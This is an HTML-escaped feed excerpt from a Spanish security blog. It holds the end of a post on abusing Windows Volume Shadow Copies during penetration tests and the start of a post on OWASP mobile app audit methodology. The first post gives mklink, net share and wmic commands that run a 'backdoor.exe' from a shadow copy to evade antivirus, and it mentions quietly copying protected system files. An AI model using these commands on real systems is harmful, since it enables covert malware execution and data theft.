&lt;a href="http://2.bp.blogspot.com/-CfsHOf74KQE/USt5BV_1muI/AAAAAAAAD5Q/aOjJSBtRsII/s1600/VSC_W8_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://2.bp.blogspot.com/-CfsHOf74KQE/USt5BV_1muI/AAAAAAAAD5Q/aOjJSBtRsII/s640/VSC_W8_4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Una vez se ha creado un enlace&amp;nbsp;simbólico&amp;nbsp;al volumen oculto en cuestión, se tiene pleno acceso al contenido almacenado en él, pudiendo realizar acciones como por ejemplo: copy.&lt;br /&gt;
&lt;br /&gt;
Con el comando MKLINK se puede copiar un fichero malware en el Sistema de manera permanente sin ser detectado por los administradores de Sistemas, aunque con algunas limitaciones, pues en el momento de acceder al volumen podría ser detectado por el sistema de antivirus, por lo que deberá de llevarse a cabo otras acciones complementarías para evitar dicha acción.&lt;br /&gt;
&lt;br /&gt;
Además, se podrá acceder a dichos&amp;nbsp;volúmenes&amp;nbsp;y copiar información del Sistema incluido aquellos archivos / directorios protegidos por el Sistema Operativo, que podrán ser&amp;nbsp;extraídos&amp;nbsp;de manera segura y sin "hacer" ruido.&lt;br /&gt;
&lt;br /&gt;
Truco para evitar el AV, si este no esta configurado para Analizar unidades en Red:&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="background-color: #f3f3f3; font-family: 'Trebuchet MS', Verdana, sans-serif; font-size: 14px; line-height: 21.59375px;"&gt;mklink /D c:\temp\drv \\.\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\&lt;/span&gt;&lt;span style="background-color: #f3f3f3; font-family: 'Trebuchet MS', Verdana, sans-serif; font-size: 14px; line-height: 21.59375px;"&gt;net share drv=c:\temp\drv&lt;/span&gt;&lt;span style="background-color: #f3f3f3; font-family: 'Trebuchet MS', Verdana, sans-serif; font-size: 14px; line-height: 21.59375px;"&gt;&lt;br /&gt; net use f: \\127.0.0.1\drv&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; font-family: 'Trebuchet MS', Verdana, sans-serif; font-size: 14px; line-height: 21.59375px;"&gt;f:\malware\backdoor.exe&lt;/span&gt;&lt;/blockquote&gt;
De esa forma podría evitarse el AV y ejecutar nuestro archivo "maligno", durante el "test de penetración".&lt;br /&gt;
&lt;br /&gt;
También podría utilizar wmic para ejecutar archivos desde el VSC (Volume Shadow Copy) enlazado&amp;nbsp;simbólicamente, tal que así:&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; font-family: 'Trebuchet MS', Verdana, sans-serif; font-size: 14px; line-height: 21.59375px;"&gt;wmic process call create \\.\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\cmd.exe&lt;/span&gt;&amp;nbsp;&lt;/blockquote&gt;
Por lo que dejo a vuestra imaginación, las&amp;nbsp;múltiples&amp;nbsp;posibilidades que se nos presentan la utilización de los&amp;nbsp;Volúmenes&amp;nbsp;Ocultos (Volume Shadow Copy) en Windows durante un test de penetración.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Otras herramientas&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="text-align: justify;"&gt;Desde un punto de vista más "forense", existen otras herramienta tanto o más interesantes que las "nativas" al Sistema Operativo, que permiten navegar de forma gráfica por los&amp;nbsp;volúmenes&amp;nbsp;ocultos (VSC).&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="text-align: justify;"&gt;&amp;gt; The &lt;/span&gt;&lt;a href="http://www.sleuthkit.org/sleuthkit/index.php" style="text-align: justify;" target="_blank"&gt;Sleuth Kit&lt;/a&gt;&lt;span style="text-align: justify;"&gt; (TSK) is a library and collection of command line tools that allow you to investigate disk images.&lt;/span&gt;&lt;br /&gt;&amp;gt;&amp;nbsp;&lt;a href="http://dfstream.blogspot.ch/2012/03/vsc-toolset-gui-tool-for-shadow-copies.html" style="text-align: justify;" target="_blank"&gt;VSC Toolset: A GUI Tool for Shadow Copies&lt;/a&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En particular ha resultado ser muy&amp;nbsp;útil, la denominada VSC Toolset, de forma que permite identificar los&amp;nbsp;volúmenes&amp;nbsp;existentes, y navegar por el sistema de ficheros de dichos&amp;nbsp;volúmenes&amp;nbsp; se necesita permisos de administrador para poder realizar dicha navegación. Es una&amp;nbsp;interfaz&amp;nbsp;GUI para los comandos nativos del Sistema Operativo, como&amp;nbsp;podréis&amp;nbsp;comprobar en la capturas de pantalla siguientes.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
Para finalizar os dejo unas capturas de pantalla de la herramienta VSC Toolset en acción:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-5Nc5oxkIKf4/USt-jrkiWBI/AAAAAAAAD7w/a_G1aNzw6hk/s1600/VSC_W8_5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="404" src="http://1.bp.blogspot.com/-5Nc5oxkIKf4/USt-jrkiWBI/AAAAAAAAD7w/a_G1aNzw6hk/s640/VSC_W8_5.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;
VSC Toolset: Interfaz GUI para vssadmin y mklink&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;El contenido de este artículo es meramente informativo y/o con fines educativos,&amp;nbsp;&lt;/span&gt;&lt;u style="background-color: #f4cccc; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;no me hago responsable&lt;/u&gt;&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&amp;nbsp;del uso que de él se pueda hacer.&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Referencias&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
[1] &lt;a href="http://technet.microsoft.com/en-us/library/cc785914(v=ws.10).aspx" target="_blank"&gt;How Volume Shadow Copy Service Works&lt;/a&gt;&lt;br /&gt;
[2] &lt;a href="http://technet.microsoft.com/en-us/library/cc757854(v=ws.10).aspx" target="_blank"&gt;What Is Volume Shadow Copy Service?&lt;/a&gt;&lt;br /&gt;
[3] &lt;a href="http://conexioninversa.blogspot.com.es/2013/01/herramientas-para-enero.html" target="_blank"&gt;Herramientas ConexiónInversa&lt;/a&gt;&lt;br /&gt;
[4] &lt;a href="http://www.schneier.com/blog/archives/2009/12/the_security_im.html" target="_blank"&gt;The Security Implications of Windows Volume Shadow Copy&lt;/a&gt;&lt;br /&gt;
[5] &lt;a href="http://www.techotopia.com/index.php/Configuring_Volume_Shadow_Copy_on_Windows_Server_2008" target="_blank"&gt;Configuring Volumen Shadow Copy on Windows Server 2003&lt;/a&gt;&lt;br /&gt;
[6] &lt;a href="http://www.forensicswiki.org/wiki/Windows_Shadow_Volumes" target="_blank"&gt;Forensics Wiki: Volume Shadow Copy&lt;/a&gt;&lt;br /&gt;
[7]&lt;a href="http://pauldotcom.com/2012/10/volume-shadow-copies---the-los.html" target="_blank"&gt; Volume Shadow Copies - The Lost Post&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=C7FLbRledfg:o0yDI7J8_tg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=C7FLbRledfg:o0yDI7J8_tg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=C7FLbRledfg:o0yDI7J8_tg:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=C7FLbRledfg:o0yDI7J8_tg:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=C7FLbRledfg:o0yDI7J8_tg:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=C7FLbRledfg:o0yDI7J8_tg:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=C7FLbRledfg:o0yDI7J8_tg:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=C7FLbRledfg:o0yDI7J8_tg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=C7FLbRledfg:o0yDI7J8_tg:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=C7FLbRledfg:o0yDI7J8_tg:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/C7FLbRledfg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/C7FLbRledfg/VSCWindows8Securitymatters.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-6AkscaHGzpU/UStex3uCPBI/AAAAAAAAD28/KnoVdB0jRZ4/s72-c/VSC_W8_1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/02/VSCWindows8Securitymatters.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-9197623146251806098</guid><pubDate>Sun, 24 Feb 2013 18:40:00 +0000</pubDate><atom:updated>2013-04-08T13:29:31.090+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Apps</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Móviles</category><category domain="http://www.blogger.com/atom/ns#">Testing</category><category domain="http://www.blogger.com/atom/ns#">OWASP</category><category domain="http://www.blogger.com/atom/ns#">parte2</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><category domain="http://www.blogger.com/atom/ns#">Metodología</category><category domain="http://www.blogger.com/atom/ns#">Guide</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><category domain="http://www.blogger.com/atom/ns#">Auditor</category><title>OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (II)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-Accpccysxfw/UWKpX648iYI/AAAAAAAAEP8/JA3VR9nrct0/s1600/OWASP_Part2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-Accpccysxfw/UWKpX648iYI/AAAAAAAAEP8/JA3VR9nrct0/s1600/OWASP_Part2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px; text-align: justify;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como continuación de la primera parte de esta serie, nos introducimos de lleno en la primera etapa de la metodología para un Análisis de la Seguridad de la Aplicaciones Móviles; La correspondiente a la fase de preparación y recepción de toda la información necesaria para llevar a cabo  el análisis de seguridad correspondiente en las etapas siguientes.&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: start;"&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: small; margin: 0px; padding: 0px;"&gt;Indice&lt;/b&gt;&lt;span style="border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: start;"&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="border: 0px; font-style: inherit; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/02/OWASP-Parte1MetodologiaAppMobile.html" style="border: 0px; color: #ff9d00; font-style: inherit; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (I)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="border: 0px; font-style: inherit; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;a href="http://www.seguridadparatodos.es/2013/02/OWASP-Parte2MetodologiaAppMobile.html" style="border: none; color: #006acd; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (II)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;a href="http://www.seguridadparatodos.es/2013/04/OWASP-Parte3MetodologiaAppMobile.html" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (III)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px;"&gt;&lt;span style="border: 0px; font-size: medium; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;&lt;span style="background-color: #073763; border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;E1: Information Gathering&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En la&amp;nbsp;&lt;b&gt;primera etapa&lt;/b&gt;&amp;nbsp;de la metodología se establece una serie de pasos y/o tareas que el auditor deberá realizar con el objetivo de prepararse para las siguiente fases de la metodología.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En esta etapa se llevará a cabo un&amp;nbsp;&lt;b&gt;reconocimiento de la aplicación&lt;/b&gt;&amp;nbsp;con objeto de identificar la magnitud y alcance de la aplicación. Será necesario la recopilación de la información que ayude a identificar la infraestructura que proporciona soporte a la aplicación así como sus posibles vectores de ataque, esta fase también es conocida como &amp;nbsp;la fase de "Reconocimiento".&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Las Actividades y tareas a realizar durante esta etapa son:&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0.4em 0px 1em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;li style="border: 0px; font-style: inherit; list-style: square outside; margin: 0px 2.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;E1.A1&lt;/b&gt;:&amp;nbsp;&lt;u style="margin: 0px; padding: 0px;"&gt;Requisitos y/o&amp;nbsp;características&amp;nbsp;necesarias para la Auditoria&lt;/u&gt;&lt;/li&gt;
&lt;li style="border: 0px; font-style: inherit; list-style: square outside; margin: 0px 2.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="margin: 0px; padding: 0px;"&gt;E1.A2&lt;/b&gt;:&amp;nbsp;&lt;u style="margin: 0px; padding: 0px;"&gt;Análisis&amp;nbsp;de los requisitos de Comunicación&lt;/u&gt;&lt;/li&gt;
